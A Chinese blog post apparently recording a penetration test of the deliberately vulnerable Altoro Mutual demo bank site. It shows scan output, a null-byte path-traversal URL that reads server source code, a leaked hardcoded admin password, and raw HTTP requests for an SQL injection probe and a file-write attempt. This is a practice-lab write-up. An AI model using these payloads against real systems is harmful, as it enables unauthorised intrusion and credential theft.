demo.testfire.net

span::selection, .CodeMirror-line > span > span::selection { background: #d7d4f0; }.CodeMirror-line::-moz-selection, .CodeMirror-line > span::-moz-selection, .CodeMirror-line > span > span::-moz-selection { background: #d7d4f0; }.cm-searching {background: #ffa; background: rgba(255, 255, 0, .4);}.cm-force-border { padding-right: .1px; }@media print { .CodeMirror div.CodeMirror-cursors {visibility: hidden;}}.cm-tab-wrap-hack:after { content: ""; }span.CodeMirror-selectedtext { background: none; }.CodeMirror-activeline-background, .CodeMirror-selected {transition: visibility 0ms 100ms;}.CodeMirror-blur .CodeMirror-activeline-background, .CodeMirror-blur .CodeMirror-selected {visibility:hidden;}.CodeMirror-blur .CodeMirror-matchingbracket {color:inherit !important;outline:none !important;text-decoration:none !important;}.CodeMirror-sizer {min-height:auto !important;}
-->
li {list-style-type:decimal;}.wiz-editor-body ol.wiz-list-level2 > li {list-style-type:lower-latin;}.wiz-editor-body ol.wiz-list-level3 > li {list-style-type:lower-roman;}.wiz-editor-body blockquote {padding: 0 12px;}.wiz-editor-body blockquote > :first-child {margin-top:0;}.wiz-editor-body blockquote > :last-child {margin-bottom:0;}.wiz-editor-body img {border:0;max-width:100%;height:auto !important;margin:2px 0;}.wiz-editor-body table {border-collapse:collapse;border:1px solid #bbbbbb;}.wiz-editor-body td,.wiz-editor-body th {padding:4px 8px;border-collapse:collapse;border:1px solid #bbbbbb;min-height:28px;word-break:break-word;box-sizing: border-box;}.wiz-hide {display:none !important;}
-->

信息搜集

域名

IP 端口信息

65.61.137.117

 
 
 
1
 
 
 
 
 
1
65.61.137.117
2














 


 








 


nmap 信息


root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A  65.61.137.117

Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT

Nmap scan report for 65.61.137.117

Host is up (0.60s latency).

Not shown: 995 closed ports

PORT     STATE    SERVICE      VERSION

80/tcp   open     http         Microsoft IIS httpd 8.0

| http-cookie-flags:

|   /:

|     amSessionId:

|_      httponly flag not set

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.0

|_http-title: Altoro Mutual

443/tcp  open     ssl/http     Microsoft IIS httpd 8.0

| http-cookie-flags:

|   /:

|     amSessionId:

|_      httponly flag not set

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.0

|_http-title: Altoro Mutual

| ssl-cert: Subject: commonName=demo.testfire.net

| Not valid before: 2014-07-01T09:54:37

|_Not valid after:  2019-12-22T09:54:37

|_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time.

445/tcp  filtered microsoft-ds

514/tcp  filtered shell

4444/tcp filtered krb524

Device type: general purpose

Running: Microsoft Windows XP|7|2012

OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012

OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012

Network Distance: 2 hops

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Host script results:

|_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s


TRACEROUTE (using port 1723/tcp)

HOP RTT      ADDRESS

1   5.10 ms  192.168.245.2

2   26.32 ms 65.61.137.117


OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds




 


 


 














x




 


 




 








 


 




1




root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A  65.61.137.117








2




Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT








3




Nmap scan report for 65.61.137.117








4




Host is up (0.60s latency).








5




Not shown: 995 closed ports








6




PORT     STATE    SERVICE      VERSION








7




80/tcp   open     http         Microsoft IIS httpd 8.0








8




| http-cookie-flags: 








9




|   /: 








10




|     amSessionId: 








11




|_      httponly flag not set








12




| http-methods: 








13




|_  Potentially risky methods: TRACE








14




|_http-server-header: Microsoft-IIS/8.0








15




|_http-title: Altoro Mutual








16




443/tcp  open     ssl/http     Microsoft IIS httpd 8.0








17




| http-cookie-flags: 








18




|   /: 








19




|     amSessionId: 








20




|_      httponly flag not set








21




| http-methods: 








22




|_  Potentially risky methods: TRACE








23




|_http-server-header: Microsoft-IIS/8.0








24




|_http-title: Altoro Mutual








25




| ssl-cert: Subject: commonName=demo.testfire.net








26




| Not valid before: 2014-07-01T09:54:37








27




|_Not valid after:  2019-12-22T09:54:37








28




|_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time.








29




445/tcp  filtered microsoft-ds








30




514/tcp  filtered shell








31




4444/tcp filtered krb524








32




Device type: general purpose








33




Running: Microsoft Windows XP|7|2012








34




OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012








35




OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012








36




Network Distance: 2 hops








37




Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows








38












39




Host script results:








40




|_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s








41












42




TRACEROUTE (using port 1723/tcp)








43




HOP RTT      ADDRESS








44




1   5.10 ms  192.168.245.2








45




2   26.32 ms 65.61.137.117








46












47




OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .








48




Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds








49


















 


 








中间件


root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/

http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]




 


 


 














x




 


 




 








 


 




1




root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/








2




http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]














 


 








总结




  • windows 服务器 , asp.net (aspx) . iis8
    • 

  • 靶机网站, 域名, cdn 等信息无需搜集




 


漏洞挖掘


错误日志,泄露物理路径


GET 请求访问 http://demo.testfire.net/comment.aspx






 


 


 












 


 


 




 








 


 




1




An Error Has Occurred








2




Summary:








3




Value cannot be null.








4












5




Error Message:








6




System.ArgumentNullException: Value cannot be null. Parameter name: input at System.Text.RegularExpressions.Regex.IsMatch(String input) at System.Text.RegularExpressions.Regex.IsMatch(String input, String pattern) at Altoro.comment.writeToFile(String file, String name, String email_addr, String subject, String comments) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31 at Altoro.comment.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 27 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)














 


 








 


疑似程序路径


c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31




 


 


 














x




 


 




 








 


 




1




c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31














 


 








 


登录处无验证码 ( maybe 暴力破解)






 


 


 














x




 


 




 








 


 




1




http://www.altoromutual.com/bank/login.aspx














 


 








 


任意文件内容读取


 


查看 login.aspx 的源代码






 


 


 














x




 


 




 








 


 




1




http://demo.testfire.net/default.aspx?content=../bank/login.aspx.cs%00.txt














 


 








给出不存在的文件会报出目录信息


Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'

        System.IO.FileNotFoundException: Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'.

            File name: 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'

            at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)

            at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)

            at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)

            at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)

            at System.IO.StreamReader..ctor(String path)

            at System.IO.File.OpenText(String path)

            at Altoro.Default.LoadFile(String myFile) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 42

            at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 70

            at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)

            at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)

            at System.Web.UI.Control.OnLoad(EventArgs e)

            at System.Web.UI.Control.LoadRecursive()

            at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)




 


 


 












 


 


 




 








 


 




1




Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'








2




        System.IO.FileNotFoundException: Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'.








3




            File name: 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'








4




            at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)








5




            at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)








6




            at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)








7




            at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)








8




            at System.IO.StreamReader..ctor(String path)








9




            at System.IO.File.OpenText(String path)








10




            at Altoro.Default.LoadFile(String myFile) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 42








11




            at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 70








12




            at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)








13




            at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)








14




            at System.Web.UI.Control.OnLoad(EventArgs e)








15




            at System.Web.UI.Control.LoadRecursive()








16




            at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)














 


 








 


读取 /admin/login.aspx 的源码 拿到 管理员的密码


if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234")




 


 


 














x




 


 




 








 


 




1




if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234") 














 


 








SQL 注入


POST /bank/login.aspx HTTP/1.1

Host: demo.testfire.net

Content-Length: 45

Cache-Control: max-age=0

Origin: http://demo.testfire.net

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: http://demo.testfire.net/bank/login.aspx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288

Connection: close


uid=hac425%27&passw=%27%27%27&btnSubmit=Login




 


 


 












 


 


 




 








 


 




1




POST /bank/login.aspx HTTP/1.1








2




Host: demo.testfire.net








3




Content-Length: 45








4




Cache-Control: max-age=0








5




Origin: http://demo.testfire.net








6




Upgrade-Insecure-Requests: 1








7




Content-Type: application/x-www-form-urlencoded








8




User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36








9




Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8








10




Referer: http://demo.testfire.net/bank/login.aspx








11




Accept-Encoding: gzip, deflate








12




Accept-Language: zh-CN,zh;q=0.9,en;q=0.8








13




Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288








14




Connection: close








15












16




uid=hac425%27&passw=%27%27%27&btnSubmit=Login














 


 








 


写文件


貌似只能写 txt , 写 aspx 访问不了


POST /comment.aspx HTTP/1.1

Host: www.altoromutual.com

Content-Length: 111

Cache-Control: max-age=0

Origin: http://www.altoromutual.com

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: http://www.altoromutual.com/feedback.aspx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004

Connection: close


cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+




 


 


 














x




 


 




 








 


 




1




POST /comment.aspx HTTP/1.1








2




Host: www.altoromutual.com








3




Content-Length: 111








4




Cache-Control: max-age=0








5




Origin: http://www.altoromutual.com








6




Upgrade-Insecure-Requests: 1








7




Content-Type: application/x-www-form-urlencoded








8




User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36








9




Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8








10




Referer: http://www.altoromutual.com/feedback.aspx








11




Accept-Encoding: gzip, deflate








12




Accept-Language: zh-CN,zh;q=0.9,en;q=0.8








13




Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004








14




Connection: close








15












16




cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+














 


 








 


 


 


 


 


 


 


 


 
												


											
demo.testfire.net 靶场测试流程记录的更多相关文章
	

    
								
  1. 利用cocoapods管理开源项目,支持 pod install安装整个流程记录(github公有库)
		
    利用cocoapods管理开源项目,支持 pod install安装整个流程记录(github公有库),完成预期的任务,大致有下面几步: 1.代码提交到github平台 2.创建.podspec 3. ...
    
		
    2. 
						
  2. 互联网App应用程序测试流程及测试总结
		
    互联网App应用程序测试流程及测试总结 1. APP测试基本流程 1.1流程图 仍然为测试环境 Pass 1.2测试周期 测试周期可按项目的开发周期来确定测试时间,一般测试时间为两三周(即15个工作日 ...
    
		
    3. 
						
  3. web测试流程的总结及关注点
		
    项目的测试流程大只包含的几个阶段:立项.需求评审.用例评审.测试执行.测试报告文档 一.立项后测试需要拿到的文档 1.需求说明书 2.原型图(及UI图) 3.接口文档 4.数据库字典(表的数量.缓存机 ...
    
		
    4. 
						
  4. 抓包工具 Fiddler 使用:弱网络环境模拟限速测试流程
		
    转自:http://www.51testing.com/html/80/n-3726980.html   抓包工具 Fiddler 使用:弱网络环境模拟限速测试流程 发表于:2018-6-06 11: ...
    
		
    5. 
						
  5. web手工项目01-系统组织框架-测试流程-需求评审-测试计划与方案
		
    回顾 SVN(定义,作用,使用操作) 软件缺陷(定义,表现形式,原因和根源,基本内容,跟踪流程) JIRA(基本介绍,使用者,工作流,问题,使用) 学习目标 掌握WAMP的环境搭建 掌握熟悉项目的步骤 ...
    
		
    6. 
						
  6. APP测试流程梳理
		
    APP测试流程梳理 1 APP测试基本流程 1.1流程图 1.2测试周期 测试周期可按项目的开发周期来确定测试时间,一般测试时间为两三周(即15个工作日),根据项目情况以及版本质量可适当缩短或延长测试 ...
    
		
    7. 
						
  7. 【转载】基于RedHatEnterpriseLinux V7(RHEL7)下SPEC CPU 2006环境搭建以及测试流程(之一)——介绍、安装准备、安装、config文件以及运行脚本介绍
		
    基于RedHatEnterpriseLinux V7(RHEL7)下SPEC CPU 2006环境搭建以及测试流程(之一)--介绍.安装准备.安装.config文件以及运行脚本介绍 其他 2018-0 ...
    
		
    8. 
						
  8. ltp 测试流程及测试脚本分析
		
    LTP介绍 (2011-03-25 18:03:53) 转载▼ 标签: ltp linux 压力测试 杂谈 分类: linux测试 LTP介绍 一.LTP介绍1.简介LTP(Linux Test Pr ...
    
		
    9. 
						
  9. 【腾讯优测干货分享】如何降低App的待机内存(二)——规范测试流程及常见问题
		
    本文来自于腾讯优测公众号(wxutest),未经作者同意,请勿转载,原文地址:https://mp.weixin.qq.com/s/806TiugiSJvFI7fH6eVA5w 作者:腾讯TMQ专项测 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. Swift循环遍历集合方法
			
      第一种方式:for-in循环 OC延续了C语言的for循环,在Swift中被彻底改造,我们无法再使用传统形式的for循环了 遍历数组和字典: //遍历数组 let iosArray = [&quo ...
    
			
    2. 
						
  2. h5仿微信、支付宝数字键盘|微信支付键盘|支付宝付款键盘
			
    html5仿微信支付数字键盘|仿支付宝键盘|h5仿微信密码输入键盘|自定义数字键盘 很早之前由于项目需求,就有开发过一个h5仿微信支付键盘,这几天就把之前的数字键盘模块独立出来,重新整理开发成demo ...
    
			
    3. 
						
  3. Mac 10.12允许任何来源
			
    sudo spctl --master-disable 然后即可设置.
    
			
    4. 
						
  4. 剑指offer四十九之把字符串转换成整数
			
    一.题目 将一个字符串转换成一个整数,要求不能使用字符串转换整数的库函数. 数值为0或者字符串不是一个合法的数值则返回0 二.思路 详见代码. 三.代码 public class Solution { ...
    
			
    5. 
						
  5. EF基础知识小记五(一对多、多对多处理)
			
    本文主要讲EF一对多关系和多对多关系的建立 一.模型设计器 1.一对多关系 右键设计器新增关联 导航属性和外键属性可修改 2.多对多关系 右键设计器新增关联 模型设计完毕之后,根据右键设计器根据模型生 ...
    
			
    6. 
						
  6. Git 命令操作记录
			
    1.安装完git软件之后(win系统的) 1)配置用户名密码: 设置本地机器默认commit的昵称与Email. 请使用有意义的名字与email. git config --global user.n ...
    
			
    7. 
						
  7. protocol buffers生成go代码原理
			
    本文描述了protocol buffers使用.proto文件生成pb.go文件的过程 编译器 编译器需要插件来编译环境,使用如下方式安装插件:go get github.com/golang/pro ...
    
			
    8. 
						
  8. Struts文件上传(FormFile)
			
    Struts中FormFile用于文件进行上传 1.在jsp文件中进行定义 <form action="/StrutsFileUpAndDown/register.do" m ...
    
			
    9. 
						
  9. 11-hdfs-NameNode-HA-wtihQJM解决单点故障问题
			
    在hdfs中, NN只有一个, 但其中保存的数据尤其重要, 所以需要将元数据保存, 其中源数据有2个形式, fsimage 和 edit文件, 最简单的解决方法就是复制fsimage, 并在文件修改时 ...
    
			
    10. 
						
  10. java编程常用的快捷键
			
    Eclipse 常用快捷键 Eclipse的编辑功能非常强大,掌握了Eclipse快捷键功能,能够大大提高开发效率.Eclipse中有如下一些和编辑相关的快捷键. 1. [ALT+/] 此快捷键为用户 ...
    
			
    11.